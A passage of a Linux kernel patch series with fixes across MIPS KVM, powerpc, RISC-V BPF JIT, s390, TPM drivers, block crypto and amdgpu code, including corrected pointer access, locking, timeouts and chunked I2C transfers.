+@@ -422,7 +422,7 @@ static void _kvm_vz_restore_htimer(struct kvm_vcpu *vcpu,
+  */
+ static void kvm_vz_restore_timer(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 cause, compare;
+ 
+ 	compare = kvm_read_sw_gc0_compare(cop0);
+@@ -517,7 +517,7 @@ static void _kvm_vz_save_htimer(struct kvm_vcpu *vcpu,
+  */
+ static void kvm_vz_save_timer(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 gctl0, compare, cause;
+ 
+ 	gctl0 = read_c0_guestctl0();
+@@ -863,7 +863,7 @@ static unsigned long mips_process_maar(unsigned int op, unsigned long val)
+ 
+ static void kvm_write_maari(struct kvm_vcpu *vcpu, unsigned long val)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	val &= MIPS_MAARI_INDEX;
+ 	if (val == MIPS_MAARI_INDEX)
+@@ -876,7 +876,7 @@ static enum emulation_result kvm_vz_gpsi_cop0(union mips_instruction inst,
+ 					      u32 *opc, u32 cause,
+ 					      struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	enum emulation_result er = EMULATE_DONE;
+ 	u32 rt, rd, sel;
+ 	unsigned long curr_pc;
+@@ -1911,7 +1911,7 @@ static int kvm_vz_get_one_reg(struct kvm_vcpu *vcpu,
+ 			      const struct kvm_one_reg *reg,
+ 			      s64 *v)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int idx;
+ 
+ 	switch (reg->id) {
+@@ -2081,7 +2081,7 @@ static int kvm_vz_get_one_reg(struct kvm_vcpu *vcpu,
+ 	case KVM_REG_MIPS_CP0_MAARI:
+ 		if (!cpu_guest_has_maar || cpu_guest_has_dyn_maar)
+ 			return -EINVAL;
+-		*v = kvm_read_sw_gc0_maari(vcpu->arch.cop0);
++		*v = kvm_read_sw_gc0_maari(&vcpu->arch.cop0);
+ 		break;
+ #ifdef CONFIG_64BIT
+ 	case KVM_REG_MIPS_CP0_XCONTEXT:
+@@ -2135,7 +2135,7 @@ static int kvm_vz_set_one_reg(struct kvm_vcpu *vcpu,
+ 			      const struct kvm_one_reg *reg,
+ 			      s64 v)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int idx;
+ 	int ret = 0;
+ 	unsigned int cur, change;
+@@ -2562,7 +2562,7 @@ static void kvm_vz_vcpu_load_tlb(struct kvm_vcpu *vcpu, int cpu)
+ 
+ static int kvm_vz_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	bool migrated, all;
+ 
+ 	/*
+@@ -2704,7 +2704,7 @@ static int kvm_vz_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 
+ static int kvm_vz_vcpu_put(struct kvm_vcpu *vcpu, int cpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	if (current->flags & PF_VCPU)
+ 		kvm_vz_vcpu_save_wired(vcpu);
+@@ -3076,7 +3076,7 @@ static void kvm_vz_vcpu_uninit(struct kvm_vcpu *vcpu)
+ 
+ static int kvm_vz_vcpu_setup(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned long count_hz = 100*1000*1000; /* default to 100 MHz */
+ 
+ 	/*
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 894d48cd04920..054844153b1fd 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -402,3 +402,11 @@ checkbin:
+ 		echo -n '*** Please use a different binutils version.' ; \
+ 		false ; \
+ 	fi
++	@if test "x${CONFIG_FTRACE_MCOUNT_USE_RECORDMCOUNT}" = "xy" -a \
++		"x${CONFIG_LD_IS_BFD}" = "xy" -a \
++		"${CONFIG_LD_VERSION}" = "23700" ; then \
++		echo -n '*** binutils 2.37 drops unused section symbols, which recordmcount ' ; \
++		echo 'is unable to handle.' ; \
++		echo '*** Please use a different binutils version.' ; \
++		false ; \
++	fi
+diff --git a/arch/powerpc/kernel/security.c b/arch/powerpc/kernel/security.c
+index 206475e3e0b48..4856e1a5161cc 100644
+--- a/arch/powerpc/kernel/security.c
++++ b/arch/powerpc/kernel/security.c
+@@ -364,26 +364,27 @@ ssize_t cpu_show_spec_store_bypass(struct device *dev, struct device_attribute *
+ 
+ static int ssb_prctl_get(struct task_struct *task)
+ {
++	/*
++	 * The STF_BARRIER feature is on by default, so if it's off that means
++	 * firmware has explicitly said the CPU is not vulnerable via either
++	 * the hypercall or device tree.
++	 */
++	if (!security_ftr_enabled(SEC_FTR_STF_BARRIER))
++		return PR_SPEC_NOT_AFFECTED;
++
++	/*
++	 * If the system's CPU has no known barrier (see setup_stf_barrier())
++	 * then assume that the CPU is not vulnerable.
++	 */
+ 	if (stf_enabled_flush_types == STF_BARRIER_NONE)
+-		/*
+-		 * We don't have an explicit signal from firmware that we're
+-		 * vulnerable or not, we only have certain CPU revisions that
+-		 * are known to be vulnerable.
+-		 *
+-		 * We assume that if we're on another CPU, where the barrier is
+-		 * NONE, then we are not vulnerable.
+-		 */
+ 		return PR_SPEC_NOT_AFFECTED;
+-	else
+-		/*
+-		 * If we do have a barrier type then we are vulnerable. The
+-		 * barrier is not a global or per-process mitigation, so the
+-		 * only value we can report here is PR_SPEC_ENABLE, which
+-		 * appears as "vulnerable" in /proc.
+-		 */
+-		return PR_SPEC_ENABLE;
+-
+-	return -EINVAL;
++
++	/*
++	 * Otherwise the CPU is vulnerable. The barrier is not a global or
++	 * per-process mitigation, so the only value that can be reported here
++	 * is PR_SPEC_ENABLE, which appears as "vulnerable" in /proc.
++	 */
++	return PR_SPEC_ENABLE;
+ }
+ 
+ int arch_prctl_spec_ctrl_get(struct task_struct *task, unsigned long which)
+diff --git a/arch/powerpc/mm/book3s64/hash_native.c b/arch/powerpc/mm/book3s64/hash_native.c
+index 9342e79870dfd..430d1d935a7cb 100644
+--- a/arch/powerpc/mm/book3s64/hash_native.c
++++ b/arch/powerpc/mm/book3s64/hash_native.c
+@@ -328,10 +328,12 @@ static long native_hpte_insert(unsigned long hpte_group, unsigned long vpn,
+ 
+ static long native_hpte_remove(unsigned long hpte_group)
+ {
++	unsigned long hpte_v, flags;
+ 	struct hash_pte *hptep;
+ 	int i;
+ 	int slot_offset;
+-	unsigned long hpte_v;
++
++	local_irq_save(flags);
+ 
+ 	DBG_LOW("    remove(group=%lx)\n", hpte_group);
+ 
+@@ -356,13 +358,16 @@ static long native_hpte_remove(unsigned long hpte_group)
+ 		slot_offset &= 0x7;
+ 	}
+ 
+-	if (i == HPTES_PER_GROUP)
+-		return -1;
++	if (i == HPTES_PER_GROUP) {
++		i = -1;
++		goto out;
++	}
+ 
+ 	/* Invalidate the hpte. NOTE: this also unlocks it */
+ 	release_hpte_lock();
+ 	hptep->v = 0;
+-
++out:
++	local_irq_restore(flags);
+ 	return i;
+ }
+ 
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 9390cdff39ffc..7c4852af9e3f1 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -1187,7 +1187,7 @@ static void __init reserve_crashkernel(void)
+ 	 */
+ 	crash_base = memblock_phys_alloc_range(crash_size, PMD_SIZE,
+ 					       search_start,
+-					       min(search_end, (unsigned long) SZ_4G));
++					       min(search_end, (unsigned long)(SZ_4G - 1)));
+ 	if (crash_base == 0) {
+ 		/* Try again without restricting region to 32bit addressible memory */
+ 		crash_base = memblock_phys_alloc_range(crash_size, PMD_SIZE,
+diff --git a/arch/riscv/net/bpf_jit.h b/arch/riscv/net/bpf_jit.h
+index d926e0f7ef571..5ee21a19969c9 100644
+--- a/arch/riscv/net/bpf_jit.h
++++ b/arch/riscv/net/bpf_jit.h
+@@ -69,7 +69,7 @@ struct rv_jit_context {
+ 	struct bpf_prog *prog;
+ 	u16 *insns;		/* RV insns */
+ 	int ninsns;
+-	int body_len;
++	int prologue_len;
+ 	int epilogue_offset;
+ 	int *offset;		/* BPF to RV */
+ 	int nexentries;
+@@ -216,8 +216,8 @@ static inline int rv_offset(int insn, int off, struct rv_jit_context *ctx)
+ 	int from, to;
+ 
+ 	off++; /* BPF branch is from PC+1, RV is from PC */
+-	from = (insn > 0) ? ctx->offset[insn - 1] : 0;
+-	to = (insn + off > 0) ? ctx->offset[insn + off - 1] : 0;
++	from = (insn > 0) ? ctx->offset[insn - 1] : ctx->prologue_len;
++	to = (insn + off > 0) ? ctx->offset[insn + off - 1] : ctx->prologue_len;
+ 	return ninsns_rvoff(to - from);
+ }
+ 
+diff --git a/arch/riscv/net/bpf_jit_core.c b/arch/riscv/net/bpf_jit_core.c
+index 737baf8715da7..7a26a3e1c73cf 100644
+--- a/arch/riscv/net/bpf_jit_core.c
++++ b/arch/riscv/net/bpf_jit_core.c
+@@ -44,7 +44,7 @@ struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
+ 	unsigned int prog_size = 0, extable_size = 0;
+ 	bool tmp_blinded = false, extra_pass = false;
+ 	struct bpf_prog *tmp, *orig_prog = prog;
+-	int pass = 0, prev_ninsns = 0, prologue_len, i;
++	int pass = 0, prev_ninsns = 0, i;
+ 	struct rv_jit_data *jit_data;
+ 	struct rv_jit_context *ctx;
+ 
+@@ -83,6 +83,12 @@ struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
+ 		prog = orig_prog;
+ 		goto out_offset;
+ 	}
++
++	if (build_body(ctx, extra_pass, NULL)) {
++		prog = orig_prog;
++		goto out_offset;
++	}
++
+ 	for (i = 0; i < prog->len; i++) {
+ 		prev_ninsns += 32;
+ 		ctx->offset[i] = prev_ninsns;
+@@ -91,12 +97,15 @@ struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
+ 	for (i = 0; i < NR_JIT_ITERATIONS; i++) {
+ 		pass++;
+ 		ctx->ninsns = 0;
++
++		bpf_jit_build_prologue(ctx);
++		ctx->prologue_len = ctx->ninsns;
++
+ 		if (build_body(ctx, extra_pass, ctx->offset)) {
+ 			prog = orig_prog;
+ 			goto out_offset;
+ 		}
+-		ctx->body_len = ctx->ninsns;
+-		bpf_jit_build_prologue(ctx);
++
+ 		ctx->epilogue_offset = ctx->ninsns;
+ 		bpf_jit_build_epilogue(ctx);
+ 
+@@ -162,10 +171,8 @@ skip_init_ctx:
+ 
+ 	if (!prog->is_func || extra_pass) {
+ 		bpf_jit_binary_lock_ro(jit_data->header);
+-		prologue_len = ctx->epilogue_offset - ctx->body_len;
+ 		for (i = 0; i < prog->len; i++)
+-			ctx->offset[i] = ninsns_rvoff(prologue_len +
+-						      ctx->offset[i]);
++			ctx->offset[i] = ninsns_rvoff(ctx->offset[i]);
+ 		bpf_prog_fill_jited_linfo(prog, ctx->offset);
+ out_offset:
+ 		kfree(ctx->offset);
+diff --git a/arch/s390/Makefile b/arch/s390/Makefile
+index ed646c583e4fe..5ed242897b0d2 100644
+--- a/arch/s390/Makefile
++++ b/arch/s390/Makefile
+@@ -27,6 +27,7 @@ KBUILD_CFLAGS_DECOMPRESSOR += -fno-delete-null-pointer-checks -msoft-float -mbac
+ KBUILD_CFLAGS_DECOMPRESSOR += -fno-asynchronous-unwind-tables
+ KBUILD_CFLAGS_DECOMPRESSOR += -ffreestanding
+ KBUILD_CFLAGS_DECOMPRESSOR += -fno-stack-protector
++KBUILD_CFLAGS_DECOMPRESSOR += -fPIE
+ KBUILD_CFLAGS_DECOMPRESSOR += $(call cc-disable-warning, address-of-packed-member)
+ KBUILD_CFLAGS_DECOMPRESSOR += $(if $(CONFIG_DEBUG_INFO),-g)
+ KBUILD_CFLAGS_DECOMPRESSOR += $(if $(CONFIG_DEBUG_INFO_DWARF4), $(call cc-option, -gdwarf-4,))
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 5a1d0ea402e41..2fb5e1541efc1 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -3975,6 +3975,13 @@ static int intel_pmu_hw_config(struct perf_event *event)
+ 		struct perf_event *leader = event->group_leader;
+ 		struct perf_event *sibling = NULL;
+ 
++		/*
++		 * When this memload event is also the first event (no group
++		 * exists yet), then there is no aux event before it.
++		 */
++		if (leader == event)
++			return -ENODATA;
++
+ 		if (!is_mem_loads_aux_event(leader)) {
+ 			for_each_sibling_event(sibling, leader) {
+ 				if (is_mem_loads_aux_event(sibling))
+diff --git a/arch/xtensa/platforms/iss/network.c b/arch/xtensa/platforms/iss/network.c
+index 9ac46ab3a296c..119345eeb04c9 100644
+--- a/arch/xtensa/platforms/iss/network.c
++++ b/arch/xtensa/platforms/iss/network.c
+@@ -237,7 +237,7 @@ static int tuntap_probe(struct iss_net_private *lp, int index, char *init)
+ 
+ 	init += sizeof(TRANSPORT_TUNTAP_NAME) - 1;
+ 	if (*init == ',') {
+-		rem = split_if_spec(init + 1, &mac_str, &dev_name);
++		rem = split_if_spec(init + 1, &mac_str, &dev_name, NULL);
+ 		if (rem != NULL) {
+ 			pr_err("%s: extra garbage on specification : '%s'\n",
+ 			       dev->name, rem);
+diff --git a/block/blk-crypto-profile.c b/block/blk-crypto-profile.c
+index 3290c03c9918d..aa7fc1436893c 100644
+--- a/block/blk-crypto-profile.c
++++ b/block/blk-crypto-profile.c
+@@ -79,7 +79,14 @@ int blk_crypto_profile_init(struct blk_crypto_profile *profile,
+ 	unsigned int slot_hashtable_size;
+ 
+ 	memset(profile, 0, sizeof(*profile));
+-	init_rwsem(&profile->lock);
++
++	/*
++	 * profile->lock of an underlying device can nest inside profile->lock
++	 * of a device-mapper device, so use a dynamic lock class to avoid
++	 * false-positive lockdep reports.
++	 */
++	lockdep_register_key(&profile->lockdep_key);
++	__init_rwsem(&profile->lock, "&profile->lock", &profile->lockdep_key);
+ 
+ 	if (num_slots == 0)
+ 		return 0;
+@@ -89,7 +96,7 @@ int blk_crypto_profile_init(struct blk_crypto_profile *profile,
+ 	profile->slots = kvcalloc(num_slots, sizeof(profile->slots[0]),
+ 				  GFP_KERNEL);
+ 	if (!profile->slots)
+-		return -ENOMEM;
++		goto err_destroy;
+ 
+ 	profile->num_slots = num_slots;
+ 
+@@ -441,6 +448,7 @@ void blk_crypto_profile_destroy(struct blk_crypto_profile *profile)
+ {
+ 	if (!profile)
+ 		return;
++	lockdep_unregister_key(&profile->lockdep_key);
+ 	kvfree(profile->slot_hashtable);
+ 	kvfree_sensitive(profile->slots,
+ 			 sizeof(profile->slots[0]) * profile->num_slots);
+diff --git a/drivers/base/regmap/regmap-irq.c b/drivers/base/regmap/regmap-irq.c
+index 3de89795f5843..18fc1c4360817 100644
+--- a/drivers/base/regmap/regmap-irq.c
++++ b/drivers/base/regmap/regmap-irq.c
+@@ -843,7 +843,7 @@ int regmap_add_irq_chip_fwnode(struct fwnode_handle *fwnode,
+ 		if (!d->config_buf)
+ 			goto err_alloc;
+ 
+-		for (i = 0; i < chip->num_config_regs; i++) {
++		for (i = 0; i < chip->num_config_bases; i++) {
+ 			d->config_buf[i] = kcalloc(chip->num_config_regs,
+ 						   sizeof(**d->config_buf),
+ 						   GFP_KERNEL);
+diff --git a/drivers/bus/intel-ixp4xx-eb.c b/drivers/bus/intel-ixp4xx-eb.c
+index 91db001eb69a6..972603ed06a6c 100644
+--- a/drivers/bus/intel-ixp4xx-eb.c
++++ b/drivers/bus/intel-ixp4xx-eb.c
+@@ -33,7 +33,7 @@
+ #define IXP4XX_EXP_TIMING_STRIDE	0x04
+ #define IXP4XX_EXP_CS_EN		BIT(31)
+ #define IXP456_EXP_PAR_EN		BIT(30) /* Only on IXP45x and IXP46x */
+-#define IXP4XX_EXP_T1_MASK		GENMASK(28, 27)
++#define IXP4XX_EXP_T1_MASK		GENMASK(29, 28)
+ #define IXP4XX_EXP_T1_SHIFT		28
+ #define IXP4XX_EXP_T2_MASK		GENMASK(27, 26)
+ #define IXP4XX_EXP_T2_SHIFT		26
+diff --git a/drivers/char/hw_random/imx-rngc.c b/drivers/char/hw_random/imx-rngc.c
+index a1c24148ed314..75fb46298a87b 100644
+--- a/drivers/char/hw_random/imx-rngc.c
++++ b/drivers/char/hw_random/imx-rngc.c
+@@ -110,7 +110,7 @@ static int imx_rngc_self_test(struct imx_rngc *rngc)
+ 	cmd = readl(rngc->base + RNGC_COMMAND);
+ 	writel(cmd | RNGC_CMD_SELF_TEST, rngc->base + RNGC_COMMAND);
+ 
+-	ret = wait_for_completion_timeout(&rngc->rng_op_done, RNGC_TIMEOUT);
++	ret = wait_for_completion_timeout(&rngc->rng_op_done, msecs_to_jiffies(RNGC_TIMEOUT));
+ 	imx_rngc_irq_mask_clear(rngc);
+ 	if (!ret)
+ 		return -ETIMEDOUT;
+@@ -187,9 +187,7 @@ static int imx_rngc_init(struct hwrng *rng)
+ 		cmd = readl(rngc->base + RNGC_COMMAND);
+ 		writel(cmd | RNGC_CMD_SEED, rngc->base + RNGC_COMMAND);
+ 
+-		ret = wait_for_completion_timeout(&rngc->rng_op_done,
+-				RNGC_TIMEOUT);
+-
++		ret = wait_for_completion_timeout(&rngc->rng_op_done, msecs_to_jiffies(RNGC_TIMEOUT));
+ 		if (!ret) {
+ 			ret = -ETIMEDOUT;
+ 			goto err;
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 95d847c9de79a..d7ef4d0a7409f 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -515,6 +515,7 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+  * 6.x.y.z series: 6.0.18.6 +
+  * 3.x.y.z series: 3.57.y.5 +
+  */
++#ifdef CONFIG_X86
+ static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
+ {
+ 	u32 val1, val2;
+@@ -563,6 +564,12 @@ release:
+ 
+ 	return true;
+ }
++#else
++static inline bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
++{
++	return false;
++}
++#endif /* CONFIG_X86 */
+ 
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 916f4ff246c14..cbbedf52607c0 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -563,15 +563,18 @@ static int crb_map_io(struct acpi_device *device, struct crb_priv *priv,
+ 	u32 rsp_size;
+ 	int ret;
+ 
+-	INIT_LIST_HEAD(&acpi_resource_list);
+-	ret = acpi_dev_get_resources(device, &acpi_resource_list,
+-				     crb_check_resource, iores_array);
+-	if (ret < 0)
+-		return ret;
+-	acpi_dev_free_resource_list(&acpi_resource_list);
+-
+-	/* Pluton doesn't appear to define ACPI memory regions */
++	/*
++	 * Pluton sometimes does not define ACPI memory regions.
++	 * Mapping is then done in crb_map_pluton
++	 */
+ 	if (priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		INIT_LIST_HEAD(&acpi_resource_list);
++		ret = acpi_dev_get_resources(device, &acpi_resource_list,
++					     crb_check_resource, iores_array);
++		if (ret < 0)
++			return ret;
++		acpi_dev_free_resource_list(&acpi_resource_list);
++
+ 		if (resource_type(iores_array) != IORESOURCE_MEM) {
+ 			dev_err(dev, FW_BUG "TPM2 ACPI table does not define a memory resource\n");
+ 			return -EINVAL;
+diff --git a/drivers/char/tpm/tpm_tis_i2c.c b/drivers/char/tpm/tpm_tis_i2c.c
+index f3a7251c8e38f..9586e0857a3e8 100644
+--- a/drivers/char/tpm/tpm_tis_i2c.c
++++ b/drivers/char/tpm/tpm_tis_i2c.c
+@@ -189,21 +189,28 @@ static int tpm_tis_i2c_read_bytes(struct tpm_tis_data *data, u32 addr, u16 len,
+ 	int ret;
+ 
+ 	for (i = 0; i < TPM_RETRY; i++) {
+-		/* write register */
+-		msg.len = sizeof(reg);
+-		msg.buf = &reg;
+-		msg.flags = 0;
+-		ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
+-		if (ret < 0)
+-			return ret;
+-
+-		/* read data */
+-		msg.buf = result;
+-		msg.len = len;
+-		msg.flags = I2C_M_RD;
+-		ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
+-		if (ret < 0)
+-			return ret;
++		u16 read = 0;
++
++		while (read < len) {
++			/* write register */
++			msg.len = sizeof(reg);
++			msg.buf = &reg;
++			msg.flags = 0;
++			ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
++			if (ret < 0)
++				return ret;
++
++			/* read data */
++			msg.buf = result + read;
++			msg.len = len - read;
++			msg.flags = I2C_M_RD;
++			if (msg.len > I2C_SMBUS_BLOCK_MAX)
++				msg.len = I2C_SMBUS_BLOCK_MAX;
++			ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
++			if (ret < 0)
++				return ret;
++			read += msg.len;
++		}
+ 
+ 		ret = tpm_tis_i2c_sanity_check_read(reg, len, result);
+ 		if (ret == 0)
+@@ -223,19 +230,27 @@ static int tpm_tis_i2c_write_bytes(struct tpm_tis_data *data, u32 addr, u16 len,
+ 	struct i2c_msg msg = { .addr = phy->i2c_client->addr };
+ 	u8 reg = tpm_tis_i2c_address_to_register(addr);
+ 	int ret;
++	u16 wrote = 0;
+ 
+ 	if (len > TPM_BUFSIZE - 1)
+ 		return -EIO;
+ 
+-	/* write register and data in one go */
+ 	phy->io_buf[0] = reg;
+-	memcpy(phy->io_buf + sizeof(reg), value, len);
+-
+-	msg.len = sizeof(reg) + len;
+ 	msg.buf = phy->io_buf;
+-	ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
+-	if (ret < 0)
+-		return ret;
++	while (wrote < len) {
++		/* write register and data in one go */
++		msg.len = sizeof(reg) + len - wrote;
++		if (msg.len > I2C_SMBUS_BLOCK_MAX)
++			msg.len = I2C_SMBUS_BLOCK_MAX;
++
++		memcpy(phy->io_buf + sizeof(reg), value + wrote,
++		       msg.len - sizeof(reg));
++
++		ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
++		if (ret < 0)
++			return ret;
++		wrote += msg.len - sizeof(reg);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/char/tpm/tpm_vtpm_proxy.c b/drivers/char/tpm/tpm_vtpm_proxy.c
+index 5c865987ba5c1..30e953988cabe 100644
+--- a/drivers/char/tpm/tpm_vtpm_proxy.c
++++ b/drivers/char/tpm/tpm_vtpm_proxy.c
+@@ -683,37 +683,21 @@ static struct miscdevice vtpmx_miscdev = {
+ 	.fops = &vtpmx_fops,
+ };
+ 
+-static int vtpmx_init(void)
+-{
+-	return misc_register(&vtpmx_miscdev);
+-}
+-
+-static void vtpmx_cleanup(void)
+-{
+-	misc_deregister(&vtpmx_miscdev);
+-}
+-
+ static int __init vtpm_module_init(void)
+ {
+ 	int rc;
+ 
+-	rc = vtpmx_init();
+-	if (rc) {
+-		pr_err("couldn't create vtpmx device\n");
+-		return rc;
+-	}
+-
+ 	workqueue = create_workqueue("tpm-vtpm");
+ 	if (!workqueue) {
+ 		pr_err("couldn't create workqueue\n");
+-		rc = -ENOMEM;
+-		goto err_vtpmx_cleanup;
++		return -ENOMEM;
+ 	}
+ 
+-	return 0;
+-
+-err_vtpmx_cleanup:
+-	vtpmx_cleanup();
++	rc = misc_register(&vtpmx_miscdev);
++	if (rc) {
++		pr_err("couldn't create vtpmx device\n");
++		destroy_workqueue(workqueue);
++	}
+ 
+ 	return rc;
+ }
+@@ -721,7 +705,7 @@ err_vtpmx_cleanup:
+ static void __exit vtpm_module_exit(void)
+ {
+ 	destroy_workqueue(workqueue);
+-	vtpmx_cleanup();
++	misc_deregister(&vtpmx_miscdev);
+ }
+ 
+ module_init(vtpm_module_init);
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index 80f4e2d14e046..2d674126160fe 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -755,7 +755,7 @@ svc_create_memory_pool(struct platform_device *pdev,
+ 	end = rounddown(sh_memory->addr + sh_memory->size, PAGE_SIZE);
+ 	paddr = begin;
+ 	size = end - begin;
+-	va = memremap(paddr, size, MEMREMAP_WC);
++	va = devm_memremap(dev, paddr, size, MEMREMAP_WC);
+ 	if (!va) {
+ 		dev_err(dev, "fail to remap shared memory\n");
+ 		return ERR_PTR(-EINVAL);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index da01c1424b4ad..260e6a3316db0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -2737,6 +2737,9 @@ int amdgpu_amdkfd_gpuvm_restore_process_bos(void *info, struct dma_fence **ef)
+ 			if (!attachment->is_mapped)
+ 				continue;
+ 
++			if (attachment->bo_va->base.bo->tbo.pin_count)
++				continue;
++
+ 			kfd_mem_dmaunmap_attachment(mem, attachment);
+ 			ret = update_gpuvm_pte(mem, attachment, &sync_obj);
+ 			if (ret) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 58fe7279599f0..ec938a1a50621 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1668,18 +1668,30 @@ int amdgpu_vm_bo_clear_mappings(struct amdgpu_device *adev,
+ 
+ 	/* Insert partial mapping before the range */
+ 	if (!list_empty(&before->list)) {
++		struct amdgpu_bo *bo = before->bo_va->base.bo;
++
+ 		amdgpu_vm_it_insert(before, &vm->va);
+ 		if (before->flags & AMDGPU_PTE_PRT)
+ 			amdgpu_vm_prt_get(adev);
++
++		if (bo && bo->tbo.base.resv == vm->root.bo->tbo.base.resv &&
++		    !before->bo_va->base.moved)
++			amdgpu_vm_bo_moved(&before->bo_va->base);
+ 	} else {
+ 		kfree(before);
+ 	}
+ 
+ 	/* Insert partial mapping after the range */
+ 	if (!list_empty(&after->list)) {
++		struct amdgpu_bo *bo = after->bo_va->base.bo;
++
+ 		amdgpu_vm_it_insert(after, &vm->va);
+ 		if (after->flags & AMDGPU_PTE_PRT)
+ 			amdgpu_vm_prt_get(adev);
++
++		if (bo && bo->tbo.base.resv == vm->root.bo->tbo.base.resv &&
++		    !after->bo_va->base.moved)
++			amdgpu_vm_bo_moved(&after->bo_va->base);
+ 	} else {
+ 		kfree(after);
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+index aa761ff3a5fae..7ba47fc1917b2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+@@ -346,7 +346,7 @@ static void nbio_v2_3_init_registers(struct amdgpu_device *adev)
+ 
+ #define NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT		0x00000000 // off by default, no gains over L1
+ #define NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT		0x00000009 // 1=1us, 9=1ms
+-#define NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT	0x0000000E // 4ms
++#define NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT	0x0000000E // 400ms
+ 
+ static void nbio_v2_3_enable_aspm(struct amdgpu_device *adev,
+ 				  bool enable)
+@@ -479,9 +479,12 @@ static void nbio_v2_3_program_aspm(struct amdgpu_device *adev)
+ 		WREG32_SOC15(NBIO, 0, mmRCC_BIF_STRAP5, data);
+ 
+ 	def = data = RREG32_PCIE(smnPCIE_LC_CNTL);
+-	data &= ~PCIE_LC_CNTL__LC_L0S_INACTIVITY_MASK;
+-	data |= 0x9 << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+-	data |= 0x1 << PCIE_LC_CNTL__LC_PMI_TO_L1_DIS__SHIFT;
++	data |= NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L0S_INACTIVITY__SHIFT;
++	if (pci_is_thunderbolt_attached(adev->pdev))
++		data |= NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT  << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
++	else
++		data |= NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
++	data &= ~PCIE_LC_CNTL__LC_PMI_TO_L1_DIS_MASK;
+ 	if (def != data)
+ 		WREG32_PCIE(smnPCIE_LC_CNTL, data);
+ 
